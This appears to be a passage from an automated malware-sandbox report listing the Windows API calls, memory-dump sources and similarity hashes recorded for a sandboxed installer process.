                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C5EAE46
                                                                                                                                                                                                                        • Part of subcall function 6C5EAD48: _memset.LIBCMT ref: 6C5EAD6C
                                                                                                                                                                                                                        • Part of subcall function 6C5EAD48: PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6C5EAD82
                                                                                                                                                                                                                        • Part of subcall function 6C5EA35F: _memset.LIBCMT ref: 6C5EA39B
                                                                                                                                                                                                                        • Part of subcall function 6C5EA35F: GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 6C5EA3B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$CombineFileH_prolog3ModuleNamePath
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2129597180-0
                                                                                                                                                                                                                      • Opcode ID: 1fe4f71d173df448baee88012dc55777cc263a8b9261981dc727c34818518d53
                                                                                                                                                                                                                      • Instruction ID: feef48626190d571357a3ef3202d627d310f934580c85e065e225ea2e9539441
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1fe4f71d173df448baee88012dc55777cc263a8b9261981dc727c34818518d53
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF03A35A02205CBDF11CBB4CA047EDB7F4AF49709F5044588561A7B90DB749D48C7AA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,00000000,?,00A74DC5,?,00000000,?,00000000,?,?,00A71043,?), ref: 00A73E9B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 8ac04211ddfa903fc06d8559d2fdd25047bc2a291478d4a2d1896b7a67051377
                                                                                                                                                                                                                      • Instruction ID: e8dc7f063d927d194c4aa83b4ef56e2172c0f0cdda8c184f6acbb7db459f5fb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac04211ddfa903fc06d8559d2fdd25047bc2a291478d4a2d1896b7a67051377
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67E04FB7B642003AE620A7A46E4AE673ADCEB80B01F648468B44DE2540FA54991093A3
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000002,?,00AA8D5A,00000000,00000000,?,?,00AE6931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 00AE6AC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                      • Opcode ID: 85f78e8ecf4627a2bfbb7e9aef170a7bff66852661c5b6903d7de37b9b977364
                                                                                                                                                                                                                      • Instruction ID: a40cd2a724f105e85ecd0d4c966ea884872b104cb32e9ab13120ac324127a576
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f78e8ecf4627a2bfbb7e9aef170a7bff66852661c5b6903d7de37b9b977364
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE0C931900158FA8B11DF66CA0199E7BB8EB253D9B10CD35B816E7190E631DA10EB61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00ADFC56,?,?,?,00000000,?,?), ref: 00ADA2C2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DrawGdipImageRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2615643336-0
                                                                                                                                                                                                                      • Opcode ID: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                                                                      • Instruction ID: 825b5352df1cab7fa619b57a0c75b48649b767bc445dadfc313672210cd53cc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E01232104209AF9F118F95CD00CE77BE9AB14750B044426BE06C6635D672DC20ABE1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00A929C2
                                                                                                                                                                                                                        • Part of subcall function 00AF4656: RaiseException.KERNEL32(?,?,?,00A780B1,?,?,?,?,?,00A780B1,00B4F5B8,00B4F5B8), ref: 00AF4698
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3976011213-0
                                                                                                                                                                                                                      • Opcode ID: fc69c647cbd38ac5d84fb05bab3a88d07fefe2bbbba06b50be3f4e2b4d8d7aa9
                                                                                                                                                                                                                      • Instruction ID: b3003d2dc2e137915655b226eb32ea3373ade2791cca8661888a8996a9e3dc31
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc69c647cbd38ac5d84fb05bab3a88d07fefe2bbbba06b50be3f4e2b4d8d7aa9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEE0923250021EBACF20AF85D902FE5B7D8AF14360F00803AFD9C86251E6B0A594CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00AA9202
                                                                                                                                                                                                                        • Part of subcall function 00A8B9B4: __EH_prolog3.LIBCMT ref: 00A8B9BB
                                                                                                                                                                                                                        • Part of subcall function 00AE5385: __EH_prolog3.LIBCMT ref: 00AE538C
                                                                                                                                                                                                                        • Part of subcall function 00AA8C9F: __EH_prolog3.LIBCMT ref: 00AA8CA6
                                                                                                                                                                                                                        • Part of subcall function 00AA8C9F: InterlockedExchange.KERNEL32(?,00003001), ref: 00AA8E38
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: H_prolog3$CountExchangeInterlockedTick
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 364811452-0
                                                                                                                                                                                                                      • Opcode ID: de082291bfe5ea8f23caed489aae4541d0764d8aff660fed5ddb4fc3a9e6ad1c
                                                                                                                                                                                                                      • Instruction ID: 6c6301e25f426fe153060f1dbc906e1899aa08eb198c085f0ff8a425810497ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de082291bfe5ea8f23caed489aae4541d0764d8aff660fed5ddb4fc3a9e6ad1c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABE065315046A1AEFF21AB70E5193EF32D46B66315F00481AF0D5470C1CFF848898652
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00A889A8
                                                                                                                                                                                                                        • Part of subcall function 00A826C0: RegCloseKey.ADVAPI32 ref: 00A826CC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 47109696-0
                                                                                                                                                                                                                      • Opcode ID: 363e9bc04c3d95788d94627fce8743c9776b1a34158c4bf357ae678a8552f346
                                                                                                                                                                                                                      • Instruction ID: 28ee24361b2a38d9e986de96c7897e324ed6b3cbc3d838d404af02519cc1ba74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 363e9bc04c3d95788d94627fce8743c9776b1a34158c4bf357ae678a8552f346
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E04F72100218FBDF14AF40CD02FAE77ADEB44314F104418F801A7250EB75AF10DBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,?,00A99E1B,?,?,?), ref: 00AA5914
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExistsFilePath
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1174141254-0
                                                                                                                                                                                                                      • Opcode ID: 2dc9d405d12e5e13a681684ee01dde01c51c5ad9a29a14e631217479a5717c3b
                                                                                                                                                                                                                      • Instruction ID: 1cb32d8053161008199ac14a6f3531a6b02d7a2c978b58751b61fec37df2fd0f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dc9d405d12e5e13a681684ee01dde01c51c5ad9a29a14e631217479a5717c3b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62E0C232D21E22EAD75067318D00AEB27D86F17360F004825F856C3190E724C901C6AC
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,?,6C6943D3,00000001,?,?,?,6C69454C,?,?,?,6C6D5448,0000000C,6C694607), ref: 6C69819E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                                      • Opcode ID: 1c0886a514dd0f49e86f1ef068d40e3f84950620f00e961d2b90b17e9196ba1d
                                                                                                                                                                                                                      • Instruction ID: 2b19c0c94e503839d920ac74e09441db4de099fe1e982659c05adc7e41829f95
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c0886a514dd0f49e86f1ef068d40e3f84950620f00e961d2b90b17e9196ba1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1D0A7B27943055EEF009F72AC08B623BFCE38979AF04443AB90CC6540FB70C550D604
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,00AA8D06,?,?,.dir,?), ref: 00AE047E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                                                      • Opcode ID: 26115bbd06b42f8a6e6791ea6e7384b3723c9e547824d1bbac83c88e3761b40f
                                                                                                                                                                                                                      • Instruction ID: 9b3f38ec53513a5f5bde6db4448a378d6a0a6a8d82c46bb269949a6897e95de6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26115bbd06b42f8a6e6791ea6e7384b3723c9e547824d1bbac83c88e3761b40f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD05E36218212AFE724EB2DF800C9777E8EF89271711485EF8C0C7260DA31ECC18A40
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetGetConnectedState.WININET(00A8BB49,00000000), ref: 00AD8968
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                                                                      • Opcode ID: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
                                                                                                                                                                                                                      • Instruction ID: d63cd3957dd503e882a137752f8e1c66450cca275cb7f0c7fcec7ac015acdac6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FD0A711A1020875EB029361CD0AB6E36DC4B0064CF4400A59453E31D0EEA8D904D2A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00A7E50C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                                                                      • Opcode ID: 77b0fa71c9e08538a0ec324171ae2c92d64ef92b21ef8a921b75a91ec5fe23dc
                                                                                                                                                                                                                      • Instruction ID: 428321aeeda2c9516ccf664d277849c13f3ba6603b4324a292583c35c9256f0e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77b0fa71c9e08538a0ec324171ae2c92d64ef92b21ef8a921b75a91ec5fe23dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80D0127324222075E525A3546C0EFCB934CDF6977AF30C467F706A60C0ABB0652146AD
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InternetGetConnectedState.WININET(?,00000000), ref: 00AB6821
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConnectedInternetState
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 97057780-0
                                                                                                                                                                                                                      • Opcode ID: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
                                                                                                                                                                                                                      • Instruction ID: b1b6fb77172e1f88b6fe89c35d11a8bb928eda9f66bab450a62e29c7155cacd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fba3c8da4412ae72caec38eaaaab726a3aca5e16287ebc894d92e3194228d85
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D0C711A1434875DB1197A59E0ABDB76DC9F0164CF1404746511D10C2EEA8D945D291
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
